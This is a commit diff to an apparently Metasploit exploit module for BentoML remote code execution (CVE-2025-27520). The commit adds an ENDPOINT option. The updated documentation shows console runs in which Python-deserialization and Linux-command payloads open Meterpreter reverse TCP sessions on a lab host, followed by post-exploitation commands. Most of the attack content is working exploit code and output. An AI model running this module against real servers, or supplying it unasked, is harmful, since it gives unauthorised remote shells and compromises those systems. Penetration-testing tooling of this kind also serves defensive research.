Make user be able to specify a particular endpoint

Takahiro-Yoko · Takahiro-Yoko · commit edcc30699add · 2025-04-16T21:47:31.000+09:00
diff --git a/documentation/modules/exploit/linux/http/bentoml_rce_cve_2025_27520.md b/documentation/modules/exploit/linux/http/bentoml_rce_cve_2025_27520.md
@@ -43,62 +43,81 @@ class Summarization:
 
 ## Options
 
+###  ENDPOINT (optional)
+Endpoint to use.
+
 
 ## Scenarios
+
+### Python payload
 ```
 msf6 > use exploit/linux/http/bentoml_rce_cve_2025_27520
-[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
+[*] Using configured payload python/meterpreter/reverse_tcp
 msf6 exploit(linux/http/bentoml_rce_cve_2025_27520) > options
 
 Module options (exploit/linux/http/bentoml_rce_cve_2025_27520):
 
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT    3000             yes       The target port (TCP)
-   SSL      false            no        Negotiate SSL/TLS for outgoing connections
-   VHOST                     no        HTTP server virtual host
-
-
-Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
-
-   Name            Current Setting  Required  Description
-   ----            ---------------  --------  -----------
-   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
-   FETCH_DELETE    true             yes       Attempt to delete the binary after execution
-   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bas
-                                              h, python3.8+)
-   FETCH_SRVHOST                    no        Local IP to use for serving payload
-   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
-   FETCH_URIPATH                    no        Local URI to use for serving payload
-   LHOST                            yes       The listen address (an interface may be specified)
-   LPORT           4444             yes       The listen port
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   ENDPOINT                   no        Endpoint to use
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     3000             yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                      no        HTTP server virtual host
 
 
-   When FETCH_FILELESS is false:
+Payload options (python/meterpreter/reverse_tcp):
 
-   Name                Current Setting  Required  Description
-   ----                ---------------  --------  -----------
-   FETCH_FILENAME      aNHnUjyAfXo      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
-   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
 
 
 Exploit target:
 
    Id  Name
    --  ----
-   0   Linux Command
+   0   Python payload
 
 
 
 View the full module info with the info, or info -d command.
 
+msf6 exploit(linux/http/bentoml_rce_cve_2025_27520) > set target Python\ payload
+target => Python payload
+msf6 exploit(linux/http/bentoml_rce_cve_2025_27520) > run lhost=192.168.56.1 rhost=192.168.56.16
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.4.2 detected, which is vulnerable.
+[*] Use /summarize as api endpoint.
+[*] Sending stage (24772 bytes) to 192.168.56.16
+[*] Expected error occurred.
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:34930) at 2025-04-16 21:44:13 +0900
+
+meterpreter > getuid
+Server username: ubu
+meterpreter > sysinfo
+Computer        : vul
+OS              : Linux 6.8.0-56-generic #58-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 14 15:33:28 UTC 2025
+Architecture    : x64
+System Language : C
+Meterpreter     : python/linux
+meterpreter > 
+```
+
+### Linux command
+```
+msf6 exploit(linux/http/bentoml_rce_cve_2025_27520) > set target Linux\ Command
+target => Linux Command
 msf6 exploit(linux/http/bentoml_rce_cve_2025_27520) > run lhost=192.168.56.1 rhost=192.168.56.16
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Version 1.4.2 detected, which is vulnerable.
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:32880) at 2025-04-15 22:29:18 +0900
+[*] Use /summarize as api endpoint.
+[*] Expected error occurred.
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:35272) at 2025-04-16 21:45:17 +0900
 
 meterpreter > getuid
 Server username: ubu
diff --git a/modules/exploits/linux/http/bentoml_rce_cve_2025_27520.rb b/modules/exploits/linux/http/bentoml_rce_cve_2025_27520.rb
@@ -62,6 +62,7 @@ def initialize(info = {})
     register_options(
       [
         Opt::RPORT(3000),
+        OptString.new('ENDPOINT', [ false, 'Endpoint to use', ''])
       ]
     )
   end
@@ -99,8 +100,9 @@ def find_api_endpoint
   end
 
   def exploit
-    @api_endpoint ||= find_api_endpoint
-    fail_with(Failure::Unknown, 'No vulnerable api endpoint.') unless @api_endpoint
+    @api_endpoint = datastore['ENDPOINT'].empty? ? find_api_endpoint : datastore['ENDPOINT']
+    fail_with(Failure::Unknown, 'No endpoint specified or no vulnerable api endpoint found.') unless @api_endpoint
+    print_status("Use #{@api_endpoint} as api endpoint.")
 
     if target['Type'] == :python
       data = Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, payload.encoded)

Original file line number	Diff line number	Diff line change
`@@ -62,6 +62,7 @@ def initialize(info = {})`
`62`	`62`	`register_options(`
`63`	`63`	`[`
`64`	`64`	`Opt::RPORT(3000),`
	`65`	`+ OptString.new('ENDPOINT', [ false, 'Endpoint to use', ''])`
`65`	`66`	`]`
`66`	`67`	`)`
`67`	`68`	`end`
`@@ -99,8 +100,9 @@ def find_api_endpoint`
`99`	`100`	`end`
`100`	`101`
`101`	`102`	`def exploit`
`102`		`- @api_endpoint \|\|= find_api_endpoint`
`103`		`- fail_with(Failure::Unknown, 'No vulnerable api endpoint.') unless @api_endpoint`
	`103`	`+ @api_endpoint = datastore['ENDPOINT'].empty? ? find_api_endpoint : datastore['ENDPOINT']`
	`104`	`+ fail_with(Failure::Unknown, 'No endpoint specified or no vulnerable api endpoint found.') unless @api_endpoint`
	`105`	`+ print_status("Use #{@api_endpoint} as api endpoint.")`
`104`	`106`
`105`	`107`	`if target['Type'] == :python`
`106`	`108`	`data = Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, payload.encoded)`